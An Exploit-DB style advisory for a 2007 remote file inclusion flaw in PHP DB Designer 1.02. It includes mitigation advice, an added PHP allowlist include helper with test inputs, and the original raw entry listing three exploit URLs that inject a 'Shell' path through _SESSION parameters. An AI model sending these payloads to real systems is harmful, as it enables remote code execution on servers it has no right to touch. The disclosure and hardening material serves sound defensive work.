Vendor: PHP DB Designer
By: GloD_M = [Mahmood_ali]
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: PHP DB Designer
Affected Version From: 1.02 and earlier
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

PHP DB Designer <= 1.02 Remote File Include Exploit

This exploit allows an attacker to include a remote file into PHP DB Designer version 1.02 and earlier. By supplying a `_SESSION[DRIVER]` parameter to db/session.php, or a `_SESSION[SITE_PATH]` parameter to wind/help.php or wind/about.php, an attacker can make the script include a malicious file hosted on a remote server.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a newer version of PHP DB Designer that does not contain this vulnerability. Alternatively, the affected files can be modified to validate and sanitize the session-derived path before it is passed to include, so that only known local files can be loaded.
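The following is an added example of the kind of fix the mitigation above describes; it is not code from the advisory or from the PHP DB Designer project, and the driver names, directory layout and function names are assumptions made for the example. Instead of including whatever path the session holds, the helper only accepts a short name from a fixed allowlist and then confirms the resolved file lives under one local directory, which rejects remote URLs, traversal strings and arbitrary values such as the `Shell` placeholder in the advisory's payloads.

```php
<?php
// Added example (not part of the advisory or of PHP DB Designer's code):
// a hardened include helper of the kind the mitigation calls for.
// Assumption: the application picks a driver file by a short name kept in
// the session, and every includable driver file lives under one directory.

declare(strict_types=1);

// Allowlist of driver names the application ships (constructed sample
// values for this example; a real deployment lists its own files).
const ALLOWED_DRIVERS = ['mysql', 'pgsql', 'sqlite'];

/**
 * Resolve a driver name to a local file path under $driverDir, or return
 * null when the name is not allowlisted or resolves outside that directory.
 */
function resolve_driver_path(string $name, string $driverDir): ?string
{
    // 1. Exact allowlist match: rejects 'http://host/x', '../x', 'Shell'.
    if (!in_array($name, ALLOWED_DRIVERS, true)) {
        return null;
    }
    // 2. Defence in depth: confirm the resolved path stays inside the directory.
    $base      = realpath($driverDir);
    $candidate = realpath($driverDir . '/' . $name . '.php');
    if ($base === false || $candidate === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

/**
 * Load the driver named in the session. session_start() runs first so the
 * value comes from server-side session storage, not from the request.
 * (Hypothetical caller; the application would use its own driver directory.)
 */
function load_session_driver(string $driverDir): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    $name = $_SESSION['DRIVER'] ?? '';
    $path = resolve_driver_path(is_string($name) ? $name : '', $driverDir);
    if ($path === null) {
        http_response_code(400);
        exit('Invalid driver selection');
    }
    require $path;
}

// Self-check with constructed inputs, run from the command line:
//   php this_file.php
if (PHP_SAPI === 'cli') {
    $dir = sys_get_temp_dir() . '/rfi_example_drivers';
    @mkdir($dir);
    file_put_contents($dir . '/mysql.php', "<?php\n// constructed stub driver\n");
    $inputs = [
        'mysql',                           // allowlisted and present -> accepted
        'Shell',                           // placeholder from the advisory -> rejected
        'http://example.invalid/shell.txt',// remote URL -> rejected
        '../../etc/passwd',                // traversal -> rejected
        'pgsql',                           // allowlisted but file missing -> rejected
    ];
    foreach ($inputs as $input) {
        $result = resolve_driver_path($input, $dir);
        printf("%-36s -> %s\n", $input, $result === null ? 'rejected' : 'ok: ' . $result);
    }
}
```

Two configuration settings close the same vector at the PHP level and are worth checking alongside any code change: `allow_url_include = Off` stops include and require from fetching remote URLs at all, and `register_globals = Off` (the directive was removed in PHP 5.4) stops request parameters from being able to populate arrays such as `$_SESSION`, which is what payloads of the `_SESSION[...]=...` form in this advisory depend on.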

Exploit-DB raw data:

# PHP DB Designer <= 1.02 Remote File Include Exploit
# D.Script: http://sourceforge.net/projects/phpdbdesigner/
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# Exploit:[Path]/db/session.php?_SESSION[DRIVER]=Shell
# Exploit:[Path]/wind/help.php?_SESSION[SITE_PATH]=Shell
# Exploit:[Path]/wind/about.php?_SESSION[SITE_PATH]=Shell

# milw0rm.com [2007-03-16]